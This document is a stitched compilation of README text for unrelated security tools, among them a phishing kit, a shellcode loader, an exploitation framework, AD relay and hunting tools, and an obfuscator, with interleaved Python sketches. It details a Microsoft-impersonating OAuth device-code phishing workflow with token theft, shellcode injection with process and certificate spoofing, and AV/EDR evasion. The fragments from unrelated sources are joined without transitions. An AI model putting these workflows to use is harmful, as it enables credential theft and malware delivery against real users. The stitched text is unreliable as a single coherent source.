.\PowerHttp.ps1 -ip <Server-IP-ADDRESS> -port <80/443> -method <GET/POST>
SquarePhish is an advanced phishing tool that uses a technique combining the OAuth Device code authentication flow and QR codes.
See PhishInSuits for more details on using OAuth Device Code flow for phishing attacks.
_____ _____ _ _ _
/ ____| | __ \| | (_) | |
| (___ __ _ _ _ __ _ _ __ ___| |__) | |__ _ ___| |__
\___ \ / _` | | | |/ _` | '__/ _ \ ___/| '_ \| / __| '_ \
____) | (_| | |_| | (_| | | | __/ | | | | | \__ \ | | |
|_____/ \__, |\__,_|\__,_|_| \___|_| |_| |_|_|___/_| |_|
| |
|_|
_________
| | /(
| O |/ (
|> |\ ( v0.1.0
|_________| \(
usage: squish.py [-h] {email,server} ...
SquarePhish -- v0.1.0
optional arguments:
-h, --help show this help message and exit
modules:
{email,server}
email send a malicious QR Code email to a provided victim
server host a malicious server QR Codes generated via the 'email' module will
point to that will activate the malicious OAuth Device Code flow
An attacker can use the email
module of SquarePhish to send a malicious QR code email to a victim. The default pretext is that the victim is required to update their Microsoft MFA authentication to continue using mobile email. The current client ID in use is the Microsoft Authenticator App.
By sending a QR code first, the attacker can avoid prematurely starting the OAuth Device Code flow that lasts only 15 minutes.
The victim will then scan the QR code found in the email body with their mobile device. The QR code will direct the victim to the attacker controlled server (running the server
module of SquarePhish), with a URL parameter set to their email address.
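The URL embedded in the QR code could be constructed along these lines (the server hostname and parameter name here are illustrative, not necessarily SquarePhish's internals):

```python
from urllib.parse import urlencode

def build_qr_url(server, victim_email):
    """Build the attacker-server URL the QR code points to, carrying the victim's email."""
    return f"https://{server}/?{urlencode({'email': victim_email})}"

# This string would then be fed to a QR-code generator and embedded in the email body.
url = build_qr_url("squarephish.example", "minnow@square.phish")
print(url)
```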
When the victim visits the malicious SquarePhish server, a background process is triggered that will start the OAuth Device Code authentication flow and email the victim a generated Device Code they are then required to enter into the legitimate Microsoft Device Code website (this will start the OAuth Device Code flow 15 minute timer).
The SquarePhish server will then continue to poll for authentication in the background.
[2022-04-08 14:31:51,962] [info] [minnow@square.phish] Polling for user authentication...
[2022-04-08 14:31:57,185] [info] [minnow@square.phish] Polling for user authentication...
[2022-04-08 14:32:02,372] [info] [minnow@square.phish] Polling for user authentication...
[2022-04-08 14:32:07,516] [info] [minnow@square.phish] Polling for user authentication...
[2022-04-08 14:32:12,847] [info] [minnow@square.phish] Polling for user authentication...
[2022-04-08 14:32:17,993] [info] [minnow@square.phish] Polling for user authentication...
[2022-04-08 14:32:23,169] [info] [minnow@square.phish] Polling for user authentication...
[2022-04-08 14:32:28,492] [info] [minnow@square.phish] Polling for user authentication...
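The polling loop above can be sketched with the poll call injected, so the logic runs without network access (the response shapes follow the standard OAuth 2.0 device code flow; this is not SquarePhish's actual implementation):

```python
import time

def poll_for_token(poll_once, interval=5, expires_in=900, clock=time.monotonic, sleep=time.sleep):
    """Poll the token endpoint until the user authenticates or the 15-minute window lapses.

    poll_once() returns a dict: {"error": "authorization_pending"} while waiting,
    or {"access_token": ...} once the victim has authenticated and consented.
    """
    deadline = clock() + expires_in
    while clock() < deadline:
        response = poll_once()
        if "access_token" in response:
            return response
        if response.get("error") != "authorization_pending":
            raise RuntimeError(response.get("error", "unknown error"))
        sleep(interval)
    raise TimeoutError("device code expired")

# Simulate a victim who authenticates on the third poll; sleep is stubbed out.
responses = iter([{"error": "authorization_pending"}] * 2 + [{"access_token": "eyJ..."}])
token = poll_for_token(lambda: next(responses), sleep=lambda _: None)
print(token["access_token"])
```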
The victim will then visit the Microsoft Device Code authentication site from either the link provided in the email or via a redirect from visiting the SquarePhish URL on their mobile device.
The victim will then enter the provided Device Code and will be prompted for consent.
After the victim authenticates and consents, an authentication token is saved locally and will provide the attacker access via the defined scope of the requesting application.
[2022-04-08 14:32:28,796] [info] [minnow@square.phish] Token info saved to minnow@square.phish.tokeninfo.json
The current scope definition:
"scope": ".default offline_access profile openid"
!IMPORTANT: Before using either module, update the required information in the settings.config file noted with Required.
Send the target victim a generated QR code that will trigger the OAuth Device Code flow.
usage: squish.py email [-h] [-c CONFIG] [--debug] [-e EMAIL]
optional arguments:
-h, --help show this help message and exit
-c CONFIG, --config CONFIG
squarephish config file [Default: settings.config]
--debug enable server debugging
-e EMAIL, --email EMAIL
victim email address to send initial QR code email to
Host a server that a generated QR code will be pointed to and when requested will trigger the OAuth Device Code flow.
usage: squish.py server [-h] [-c CONFIG] [--debug]
optional arguments:
-h, --help show this help message and exit
-c CONFIG, --config CONFIG
squarephish config file [Default: settings.config]
--debug enable server debugging
All of the applicable settings for execution can be found and modified via the settings.config file. There are several pieces of required information that do not have a default value that must be filled out by the user: SMTP_EMAIL, SMTP_PASSWORD, and SQUAREPHISH_SERVER (only when executing the email module). All configuration options have been documented within the settings file via in-line comments.
Note: The SQUAREPHISH_
values present in the 'EMAIL' section of the configuration should match the values set when running the SquarePhish server.
Currently, the pre-defined pretexts can be found in the pretexts folder.
To write custom pretexts, use the existing template via the pretexts/iphone/ folder. An email template is required for both the initial QR code email as well as the follow up device code email.
Important: When writing a custom pretext, note the existence of %s
in both pretext templates. This exists to allow SquarePhish to populate the correct data when generating emails (QR code data and/or device code value).
There are several HTTP response headers defined in the utils.py file. These headers are defined to override any existing Flask response header values and to provide a more 'legitimate' response from the server. These header values can be modified, removed and/or additional headers can be included for better OPSEC.
{
"vary": "Accept-Encoding",
"server": "Microsoft-IIS/10.0",
"tls_version": "tls1.3",
"content-type": "text/html; charset=utf-8",
"x-appversion": "1.0.8125.42964",
"x-frame-options": "SAMEORIGIN",
"x-ua-compatible": "IE=Edge;chrome=1",
"x-xss-protection": "1; mode=block",
"x-content-type-options": "nosniff",
"strict-transport-security": "max-age=31536000",
}
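A sketch of how such overrides could be applied on top of a framework's default response headers (a plain dict merge for illustration; the real tool wires this into Flask's response objects):

```python
# A subset of the spoofed values above; override keys are case-normalized for simplicity.
SPOOFED_HEADERS = {
    "server": "Microsoft-IIS/10.0",
    "x-frame-options": "SAMEORIGIN",
    "x-content-type-options": "nosniff",
}

def apply_headers(response_headers, overrides=SPOOFED_HEADERS):
    """Override any existing header values with the configured spoofed ones."""
    merged = dict(response_headers)
    merged.update(overrides)  # spoofed values win over framework defaults
    return merged

print(apply_headers({"server": "Werkzeug/2.0", "content-length": "42"}))
```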
An automated tool which can simultaneously crawl, fill forms, trigger error/debug pages and "loot" secrets out of the client-facing code of sites.
To use the tool, you can grab any one of the pre-built binaries from the Releases section of the repository. If you want to build the source code yourself, you will need Go > 1.16 to build it. Simply running go build
will output a usable binary for you.
Additionally, you will need two JSON files (lootdb.json and regexes.json) along with the binary, which you can get from the repo itself. Once you have all 3 files in the same folder, you can go ahead and fire up the tool.
Video demo:
Here is the help usage of the tool:
$ ./httploot --help
_____
)=(
/ \ H T T P L O O T
( $ ) v0.1
\___/
[+] HTTPLoot by RedHunt Labs - A Modern Attack Surface (ASM) Management Company
[+] Author: Pinaki Mondal (RHL Research Team)
[+] Continuously Track Your Attack Surface using https://redhuntlabs.com/nvadr.
Usage of ./httploot:
-concurrency int
Maximum number of sites to process concurrently (default 100)
-depth int
Maximum depth limit to traverse while crawling (default 3)
-form-length int
Length of the string to be randomly generated for filling form fields (default 5)
-form-string string
Value with which the tool will auto-fill forms, strings will be randomly generated if no value is supplied
-input-file string
Path of the input file containing domains to process
-output-file string
CSV output file path to write the results to (default "httploot-results.csv")
-parallelism int
Number of URLs per site to crawl parallely (default 15)
-submit-forms
Whether to auto-submit forms to trigger debug pages
-timeout int
The default timeout for HTTP requests (default 10)
-user-agent string
User agent to use during HTTP requests (default "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:98.0) Gecko/20100101 Firefox/98.0")
-verify-ssl
Verify SSL certificates while making HTTP requests
-wildcard-crawl
Allow crawling of links outside of the domain being scanned
There are two flags which help with the concurrent scanning:
-concurrency: specifies the maximum number of sites to process concurrently.
-parallelism: specifies the number of URLs per site to crawl in parallel.
Both -concurrency and -parallelism are crucial to the performance and reliability of the tool's results.
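The two-level concurrency model can be sketched with nested thread pools (illustrative only; HTTPLoot itself is written in Go, and crawl_url here is a stand-in for fetching and parsing):

```python
from concurrent.futures import ThreadPoolExecutor

def crawl_url(url):
    """Placeholder for fetching and parsing a single URL."""
    return f"crawled {url}"

def crawl_site(site, urls, parallelism=15):
    # Inner pool: -parallelism URLs per site.
    with ThreadPoolExecutor(max_workers=parallelism) as pool:
        return list(pool.map(crawl_url, (f"{site}{u}" for u in urls)))

def crawl_all(sites, concurrency=100):
    # Outer pool: -concurrency sites at once.
    with ThreadPoolExecutor(max_workers=concurrency) as pool:
        return list(pool.map(lambda s: crawl_site(s, ["/", "/login"]), sites))

results = crawl_all(["https://a.example", "https://b.example"], concurrency=2)
print(results)
```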
The crawl depth can be specified using the -depth
flag. The integer value supplied is the maximum depth of link chains the crawler will follow on a site.
An important flag -wildcard-crawl
can be used to specify whether to crawl URLs outside the domain in scope.
NOTE: Using this flag might lead to infinite crawling in worst case scenarios if the crawler finds links to other domains continuously.
If you want the tool to scan for debug pages, you need to specify the -submit-forms
argument. This will direct the tool to autosubmit forms and try to trigger error/debug pages once a tech stack has been identified successfully.
If the -submit-forms
flag is enabled, you can control the string to be submitted in the form fields. The -form-string
specifies the string to be submitted, while the -form-length
can control the length of the string to be randomly generated which will be filled into the forms.
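The random fill value could be generated along these lines (a hypothetical helper mirroring what -form-length controls; not HTTPLoot's actual code):

```python
import random
import string

def random_form_string(length=5):
    """Generate a random alphanumeric value to auto-fill form fields."""
    return "".join(random.choices(string.ascii_letters + string.digits, k=length))

value = random_form_string(5)
print(value, len(value))
```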
Flags like:
-timeout - specifies the timeout of HTTP requests.
-user-agent - specifies the user-agent to use in HTTP requests.
-verify-ssl - specifies whether or not to verify SSL certificates.
The input file to read can be specified using the -input-file argument: a file path containing a list of URLs to scan with the tool. The -output-file flag can be used to specify the result output file path, which by default is a file called httploot-results.csv.
Further details about the research which led to the development of the tool can be found on our RedHunt Labs Blog.
The tool is licensed under the MIT license. See LICENSE.
Currently the tool is at v0.1.
The RedHunt Labs Research Team would like to extend credits to the creators & maintainers of shhgit for the regular expressions provided by them in their repository.
To know more about our Attack Surface Management platform, check out NVADR.
A summary of the changelog since August's 2022.3 release:
Shennina is an automated host exploitation framework. The mission of the project is to fully automate the scanning, vulnerability scanning/analysis, and exploitation using Artificial Intelligence. Shennina is integrated with Metasploit and Nmap for performing the attacks, as well as being integrated with an in-house Command-and-Control Server for exfiltrating data from compromised machines automatically.
This was developed by Mazin Ahmed and Khalid Farah within the HITB CyberWeek 2019 AI challenge. The project is developed based on the concept of DeepExploit by Isao Takaesu.
Shennina scans a set of input targets for available network services, uses its AI engine to identify recommended exploits for the attacks, and then attempts to test and attack the targets. If the attack succeeds, Shennina proceeds with the post-exploitation phase.
The AI engine is initially trained against live targets to learn reliable exploits against remote services.
Shennina also supports a "Heuristics" mode for identifying recommended exploits.
The documentation can be found in the Docs directory within the project.
The problem should be solved by a hash tree without using "AI", however, the HITB Cyber Week AI Challenge required the project to find ways to solve it through AI.
This project is a security experiment.
This project is made for educational and ethical testing purposes only. Usage of Shennina for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.
laZzzy is a shellcode loader that demonstrates different execution techniques commonly employed by malware. laZzzy was developed using different open-source header-only libraries.
Direct syscalls and native (Nt*) functions (not all functions but most)
Payload padding (if necessary) with NOPs (\x90)
Windows machine with Visual Studio and the following components, which can be installed from Visual Studio Installer
> Individual Components
:
C++ Clang Compiler for Windows
and C++ Clang-cl for build tools
ClickOnce Publishing
Python3 and the required modules:
python3 -m pip install -r requirements.txt
(venv) PS C:\MalDev\laZzzy> python3 .\builder.py -h
โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โฃโฃโฃโกโ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ
โ โ โฃฟโฃฟโ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โฃ โฃคโฃคโฃคโฃคโ โขโฃผโ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ
โ โ โฃฟโฃฟโ โ โ โ โขโฃโฃโกโ โ โ โขโฃโฃโฃโฃโฃโกโ โขโฃผโกฟโ โ โ โ โ โ โขโฃโกโ โ โ โฃโกโ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ
โ โ โฃฟโฃฟโ โ โฃฐโฃพโ โ โ โขปโฃฟโ โ โ โ โขโฃฟโฃฟโ โ โฃ โฃฟโฃฏโฃคโฃคโ โ โ โ โ โ โขฟโฃทโกโ โฃฐโฃฟโ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ
โ โ โฃฟโฃฟโ โ โฃฟโฃฏ โ โ โขธโฃฟโ โ โ โฃ โฃฟโกโ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โขฟโฃงโฃฐโฃฟโ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ
โ โ โฃฟโฃฟโ โ โ โ ฟโฃทโฃฆโฃดโขฟโฃฟโ โขโฃพโฃฟโฃฟโฃถโฃถโฃถโ โ โ โ โ โ โ โ โ โ โ โ โ โ โฃฟโกฟโ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ
โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โฃผโกฟโ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ
โ โ by: CaptMeeloโ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ โ
usage: builder.py [-h] -s -p -m [-tp] [-sp] [-pp] [-b] [-d]
options:
-h, --help show this help message and exit
-s path to raw shellcode
-p password
-m shellcode execution method (e.g. 1)
-tp process to inject (e.g. svchost.exe)
-sp process to spawn (e.g. C:\\Windows\\System32\\RuntimeBroker.exe)
-pp parent process to spoof (e.g. explorer.exe)
-b binary to spoof metadata (e.g. C:\\Windows\\System32\\RuntimeBroker.exe)
-d domain to spoof (e.g. www.microsoft.com)
shellcode execution method:
1 Early-bird APC Queue (requires sacrificial process)
2 Thread Hijacking (requires sacrificial process)
3 KernelCallbackTable (requires sacrificial process that has GUI)
4 Section View Mapping
5 Thread Suspension
6 LineDDA Callback
7 EnumSystemGeoID Callback
8 FLS Callback
9 SetTimer
10 Clipboard
Execute builder.py
and supply the necessary data.
(venv) PS C:\MalDev\laZzzy> python3 .\builder.py -s .\calc.bin -p CaptMeelo -m 1 -pp explorer.exe -sp C:\\Windows\\System32\\notepad.exe -d www.microsoft.com -b C:\\Windows\\System32\\mmc.exe
[+] XOR-encrypting payload with
[*] Key: d3b666606468293dfa21ce2ff25e86f6
[+] AES-encrypting payload with
[*] IV: f96312f17a1a9919c74b633c5f861fe5
[*] Key: 6c9656ed1bc50e1d5d4033479e742b4b8b2a9b2fc81fc081fc649e3fb4424fec
[+] Modifying template using
[*] Technique: Early-bird APC Queue
[*] Process to inject: None
[*] Process to spawn: C:\\Windows\\System32\\RuntimeBroker.exe
[*] Parent process to spoof: svchost.exe
[+] Spoofing metadata
[*] Binary: C:\\Windows\\System32\\RuntimeBroker.exe
[*] CompanyName: Microsoft Corporation
[*] FileDescription: Runtime Broker
[*] FileVersion: 10.0.22621.608 (WinBuild.160101.0800)
[*] InternalName: RuntimeBroker.exe
[*] LegalCopyright: ยฉ Microsoft Corporation. All rights reserved.
[*] OriginalFilename: RuntimeBroker.exe
[*] ProductName: Microsoftยฎ Windowsยฎ Operating System
[*] ProductVersion: 10.0.22621.608
[+] Compiling project
[*] Compiled executable: C:\MalDev\laZzzy\loader\x64\Release\laZzzy.exe
[+] Signing binary with spoofed cert
[*] Domain: www.microsoft.com
[*] Version: 2
[*] Serial: 33:00:59:f8:b6:da:86:89:70:6f:fa:1b:d9:00:00:00:59:f8:b6
[*] Subject: /C=US/ST=WA/L=Redmond/O=Microsoft Corporation/CN=www.microsoft.com
[*] Issuer: /C=US/O=Microsoft Corporation/CN=Microsoft Azure TLS Issuing CA 06
[*] Not Before: October 04 2022
[*] Not After: September 29 2023
[*] PFX file: C:\MalDev\laZzzy\output\www.microsoft.com.pfx
[+] All done!
[*] Output file: C:\MalDev\laZzzy\output\RuntimeBroker.exe
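The XOR stage of the pipeline above can be sketched as follows (key size and NOP padding mirror the log output; the AES stage would typically require a third-party library such as pycryptodome, so it is omitted, and this is a sketch, not laZzzy's actual code):

```python
import os

def pad_with_nops(shellcode, block=16):
    """Pad the payload with NOPs (\\x90) up to the next block boundary."""
    remainder = len(shellcode) % block
    return shellcode if remainder == 0 else shellcode + b"\x90" * (block - remainder)

def xor_encrypt(shellcode, key):
    """XOR the payload with a repeating key; XOR is symmetric, so the same call decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(shellcode))

payload = pad_with_nops(b"\xfc\x48\x83\xe4\xf0")  # truncated demo bytes, padded to 16
key = os.urandom(16)                              # randomly generated 16-byte key
encrypted = xor_encrypt(payload, key)
assert xor_encrypt(encrypted, key) == payload     # round-trips back to the original
print(len(payload), len(encrypted))
```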
A framework for gathering OSINT on GitHub users, repositories and organizations.
Refer to the Wiki for installation instructions, in addition to all other documentation.
Octosuite automatically logs network and user activity of each session; the logs are saved by date and time in the .logs folder.
The BloodHound data collector for Microsoft Azure
Download the appropriate binary for your platform from one of our Releases.
The rolling release contains pre-built binaries that are automatically kept up-to-date with the main
branch and can be downloaded from here.
Warning: The rolling release may be unstable.
To build this project from source run the following:
go build -ldflags="-s -w -X github.com/bloodhoundad/azurehound/constants.Version=`git describe --tags --exact-match 2> /dev/null || git rev-parse HEAD`"
Print all Azure Tenant data to stdout
โฏ azurehound list -u "$USERNAME" -p "$PASSWORD" -t "$TENANT"
Print all Azure Tenant data to file
โฏ azurehound list -u "$USERNAME" -p "$PASSWORD" -t "$TENANT" -o "mytenant.json"
Configure and start data collection service for BloodHound Enterprise
โฏ azurehound configure
(follow prompts)
โฏ azurehound start
โฏ azurehound --help
AzureHound vx.x.x
Created by the BloodHound Enterprise team - https://bloodhoundenterprise.io
The official tool for collecting Azure data for BloodHound and BloodHound Enterprise
Usage:
azurehound [command]
Available Commands:
completion Generate the autocompletion script for the specified shell
configure Configure AzureHound
help Help about any command
list Lists Azure Objects
start Start Azure data collection service for BloodHound Enterprise
Flags:
-c, --config string AzureHound configuration file (default: /Users/dlees/.config/azurehound/config.json)
-h, --help help for azurehound
--json Output logs as json
-j, --jwt string Use an acquired JWT to authenticate into Azure
--log-file string Output logs to this file
--proxy string Sets the proxy URL for the AzureHound service
-r, --refresh-token string Use an acquired refresh token to authenticate into Azure
-v, --verbosity int AzureHound verbosity level (defaults to 0) [Min: -1, Max: 2]
--version version for azurehound
Use "azurehound [command] --help" for more information about a command.
This repository includes two utilities NTLMParse and ADFSRelay. NTLMParse is a utility for decoding base64-encoded NTLM messages and printing information about the underlying properties and fields within the message. Examining these NTLM messages is helpful when researching the behavior of a particular NTLM implementation. ADFSRelay is a proof of concept utility developed while researching the feasibility of NTLM relaying attacks targeting the ADFS service. This utility can be leveraged to perform NTLM relaying attacks targeting ADFS. We have also released a blog post discussing ADFS relaying attacks in more detail [1].
To use the NTLMParse utility you simply need to pass a Base64 encoded message to the application and it will decode the relevant fields and structures within the message. The snippet given below shows the expected output of NTLMParse when it is invoked:
โ ~ pbpaste | NTLMParse
(ntlm.AUTHENTICATE_MESSAGE) {
Signature: ([]uint8) (len=8 cap=585) {
00000000 4e 54 4c 4d 53 53 50 00 |NTLMSSP.|
},
MessageType: (uint32) 3,
LmChallengeResponseFields: (struct { LmChallengeResponseLen uint16; LmChallengeResponseMaxLen uint16; LmChallengeResponseBufferOffset uint32; LmChallengeResponse []uint8 }) {
LmChallengeResponseLen: (uint16) 24,
LmChallengeResponseMaxLen: (uint16) 24,
LmChallengeResponseBufferOffset: (uint32) 160,
LmChallengeResponse: ([]uint8) (len=24 cap=425) {
00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000010 00 00 00 00 00 00 00 00 |........|
}
},
NtChallengeResponseFields: (struct { NtChallengeResponseLen uint16; NtChallengeResponseMaxLen uint16; NtChallengeResponseBufferOffset uint32; NtChallengeResponse []uint8; NTLMv2Response ntlm.NTLMv2_RESPONSE }) {
NtChallengeResponseLen: (uint16) 384,
NtChallengeResponseMaxLen: (uint16) 384,
NtChallengeResponseBufferOffset: (uint32) 184,
NtChallengeResponse: ([]uint8) (len=384 cap=401) {
00000000 30 eb 30 1f ab 4f 37 4d 79 59 28 73 38 51 19 3b |0.0..O7MyY(s8Q.;|
00000010 01 01 00 00 00 00 00 00 89 5f 6d 5c c8 72 d8 01 |........._m\.r..|
00000020 c9 74 65 45 b9 dd f7 35 00 00 00 00 02 00 0e 00 |.teE...5........|
00000030 43 00 4f 00 4e 00 54 00 4f 00 53 00 4f 00 01 00 |C.O.N.T.O.S.O...|
00000040 1e 00 57 00 49 00 4e 00 2d 00 46 00 43 00 47 00 |..W.I.N.-.F.C.G.|
Below is a sample NTLM AUTHENTICATE_MESSAGE message that can be used for testing:
TlRMTVNTUAADAAAAGAAYAKAAAACAAYABuAAAABoAGgBYAAAAEAAQAHIAAAAeAB4AggAAABAAEAA4AgAAFYKI4goAYUoAAAAPqfU7N7/JSXVfIdKvlIvcQkMATwBOAFQATwBTAE8ALgBMAE8AQwBBAEwAQQBDAHIAbwBzAHMAZQByAEQARQBTAEsAVABPAFAALQBOAEkARAA0ADQANQBNAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADDrMB+rTzdNeVkoczhRGTsBAQAAAAAAAIlfbVzIctgByXRlRbnd9zUAAAAAAgAOAEMATwBOAFQATwBTAE8AAQAeAFcASQBOAC0ARgBDAEcAVQA0AEcASABPADAAOAA0AAQAGgBDAE8ATgBUAE8AUwBPAC4ATABPAEMAQQBMAAMAOgBXAEkATgAtAEYAQwBHAFUANABHAEgATwAwADgANAAuAEMATwBOAFQATwBTAE8ALgBMAE8AQwBBAEwABQAaAEMATwBOAFQATwBTAE8ALgBMAE8AQwBBAEwABwAIAIlfbVzIctgBBgAEAAIAAAAIADAAMAAAAAAAAAABAAAAACAAABQaOHb4nG5F2JL1tA5kL+nKQXJSJLDWljeBv+/XlPXpCgAQAON+EDXYnla0bjpwA8gfVEgJAD4ASABUAFQAUAAvAHMAdABzAC4AYwBvAG4AdABvAHMAbwBjAG8AcgBwAG8AcgBhAHQAaQBvAG4ALgBjAG8AbQAAAAAAAAAAAKDXom0m65knt1NeZF1ZxxQ=
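The start of such a message can be decoded with nothing but the standard library. This sketch parses only the fixed 12-byte header (signature plus message type), a small subset of what NTLMParse prints:

```python
import base64
import struct

def parse_ntlm_header(b64_message):
    """Decode the 8-byte signature and 4-byte little-endian message type of an NTLM message."""
    raw = base64.b64decode(b64_message)
    signature = raw[:8]
    if signature != b"NTLMSSP\x00":
        raise ValueError("not an NTLM message")
    (message_type,) = struct.unpack("<I", raw[8:12])  # 1=NEGOTIATE, 2=CHALLENGE, 3=AUTHENTICATE
    return signature, message_type

# A minimal, hand-built AUTHENTICATE_MESSAGE header (type 3).
msg = base64.b64encode(b"NTLMSSP\x00" + struct.pack("<I", 3)).decode()
signature, message_type = parse_ntlm_header(msg)
print(signature, message_type)
```

The same function also works on the first bytes of the sample message above, since every NTLM message begins with the same header layout.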
The single required argument for ADFSRelay is the URL of the ADFS server to target for an NTLM relaying attack. Three optional arguments are -debug to enable debugging mode, -port to define the port the service should listen on, and -help to display the help menu. An example help menu is given below:
โ ~ ADFSRelay -h
Usage of ADFSRelay:
-debug
Enables debug output
-help
Show the help menu
-port int
The port the HTTP listener should listen on (default 8080)
-targetSite string
The ADFS site to target for the relaying attack (e.g. https://sts.contoso.com)
โ ~
[1] https://www.praetorian.com/blog/relaying-to-adfs-attacks/
FarsightAD
is a PowerShell script that aims to help uncover (potential) persistence mechanisms deployed by a threat actor following an Active Directory domain compromise.
The script produces CSV / JSON file exports of various objects and their attributes, enriched with timestamps from replication metadata. Additionally, if executed with replication privileges, the Directory Replication Service (DRS)
protocol is leveraged to detect fully or partially hidden objects.
For more information, refer to the SANS DFIR Summit 2022 introductory slides.
FarsightAD
requires PowerShell 7
and the ActiveDirectory
module updated for PowerShell 7
.
On Windows 10 / 11, the module can be installed through the Optional Features
as RSAT:
Active Directory Domain Services and Lightweight Directory Services Tools
. An already installed module can be updated with:
Add-WindowsCapability -Online -Name Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0
If the module is correctly updated, Get-Command Get-ADObject
should return:
CommandType Name Version Source
----------- ---- ------- ------
Cmdlet Get-ADObject 1.0.X.X ActiveDirectory
. .\FarsightAD.ps1
Invoke-ADHunting [-Server <DC_IP | DC_HOSTNAME>] [-Credential <PS_CREDENTIAL>] [-ADDriveName <AD_DRIVE_NAME>] [-OutputFolder <OUTPUT_FOLDER>] [-ExportType <CSV | JSON>]
Cmdlet | Synopsis |
---|---|
Invoke-ADHunting | Execute all the FarsightAD AD hunting cmdlets (mentioned below). |
Export-ADHuntingACLDangerousAccessRights | Export dangerous ACEs, i.e. ACEs that allow takeover of the underlying object, on all the domain's objects. May take a while on larger domains. |
Export-ADHuntingACLDefaultFromSchema | Export the ACL configured in the defaultSecurityDescriptor attribute of Schema classes. Non-default (as defined in the Microsoft documentation) ACLs are identified and potentially dangerous ACEs are highlighted. |
Export-ADHuntingACLPrivilegedObjects | Export the ACL configured on the privileged objects in the domain and highlight potentially dangerous access rights. |
Export-ADHuntingADCSCertificateTemplates | Export information and access rights on certificate templates. The following notable parameters are retrieved: certificate template publish status, certificate usage, if the subject is constructed from user-supplied data, and access control (enrollment / modification). |
Export-ADHuntingADCSPKSObjects | Export information and access rights on sensitive PKS objects (NTAuthCertificates, certificationAuthority, and pKIEnrollmentService). |
Export-ADHuntingGPOObjectsAndFilesACL | Export ACL access rights information on GPO objects and files, highlighting GPOs that are applied to privileged users or computers. |
Export-ADHuntingGPOSettings | Export information on various settings configured by GPOs that could be leveraged for persistence (privileges and logon rights, restricted groups membership, scheduled and immediate tasks V1 / V2, machine and user logon / logoff scripts). |
Export-ADHuntingHiddenObjectsWithDRSRepData | Export the objects' attributes that are accessible through replication (with the Directory Replication Service (DRS) protocol) but not by direct query. Access controls are not taken into account for replication operations, which makes it possible to identify access controls that block access to specific object attribute(s). Only a limited set of sensitive attributes are assessed. |
Export-ADHuntingKerberosDelegations | Export the Kerberos delegations that are considered dangerous (unconstrained, constrained to a privileged service, or resources-based constrained on a privileged service). |
Export-ADHuntingPrincipalsAddedViaMachineAccountQuota | Export the computers that were added to the domain by non-privileged principals (using the ms-DS-MachineAccountQuota mechanism). |
Export-ADHuntingPrincipalsCertificates | Export parsed accounts' certificate(s) (for accounts having a non empty userCertificate attribute). The certificates are parsed to retrieve a number of parameters: certificate validity timestamps, certificate purpose, certificate subject and eventual SubjectAltName(s), ... |
Export-ADHuntingPrincipalsDontRequirePreAuth | Export the accounts that do not require Kerberos pre-authentication. |
Export-ADHuntingPrincipalsOncePrivileged | Export the accounts that were once member of privileged groups. |
Export-ADHuntingPrincipalsPrimaryGroupID | Export the accounts that have a non default primaryGroupID attribute, highlighting RID linked to privileged groups. |
Export-ADHuntingPrincipalsPrivilegedAccounts | Export detailed information about members of privileged groups. |
Export-ADHuntingPrincipalsPrivilegedGroupsMembership | Export privileged groups' current and past members, retrieved using replication metadata. |
Export-ADHuntingPrincipalsSIDHistory | Export the accounts that have a non-empty SID History attribute, with resolution of the associated domain and highlighting of privileged SIDs. |
Export-ADHuntingPrincipalsShadowCredentials | Export parsed Key Credentials information (of accounts having a non-empty msDS-KeyCredentialLink attribute). |
Export-ADHuntingPrincipalsTechnicalPrivileged | Export the technical privileged accounts (SERVER_TRUST_ACCOUNT and INTERDOMAIN_TRUST_ACCOUNT). |
Export-ADHuntingPrincipalsUPNandAltSecID | Export the accounts that define a UserPrincipalName or AltSecurityIdentities attribute, highlighting potential anomalies. |
Export-ADHuntingTrusts | Export the trusts of all the domains in the forest. A number of parameters are retrieved for each trust: transitivity, SID filtering, TGT delegation. |
More information on each cmdlet usage can be retrieved using Get-Help -Full <CMDLET>
.
Adding a fully hidden user
Hiding the SID History attribute of an user
Uncovering the fully and partially hidden users with Export-ADHuntingHiddenObjectsWithDRSRepData
The C# code for DRS requests was adapted from:
MakeMeEnterpriseAdmin by @vletoux.
Mimikatz by @gentilkiwi and @vletoux.
SharpKatz by @b4rtik.
The functions to parse Key Credentials are from the ADComputerKeys PowerShell module.
The AD CS related persistence is based on work from:
The function to parse Service Principal Name is based on work from Adam Bertram.
CC BY 4.0 licence - https://creativecommons.org/licenses/by/4.0/
Codecepticon is a .NET application that allows you to obfuscate C#, VBA/VB6 (macros), and PowerShell source code, and is developed for offensive security engagements such as Red/Purple Teams. What separates Codecepticon from other obfuscators is that it targets the source code rather than the compiled executables, and was developed specifically for AV/EDR evasion.
Codecepticon allows you to obfuscate and rewrite code, but also provides features such as rewriting the command line as well.
! Before we begin !
This documentation is on how to install and use Codecepticon only. Compilation, usage, and support for tools like Rubeus and SharpHound will not be provided. Refer to each project's repo separately for more information.
Codecepticon is actively developed/tested in VS2022, but it should work in VS2019 as well. Any tickets/issues created for VS2019 and below, will not be investigated unless the issue is reproducible in VS2022. So please use the latest and greatest VS2022.
The following packages MUST be v3.9.0, as newer versions have the following issue which is still open: dotnet/roslyn#58463
Codecepticon checks the version of these packages on runtime and will inform you if the version is different to v3.9.0.
It cannot be stressed enough: always test your obfuscated code locally first.
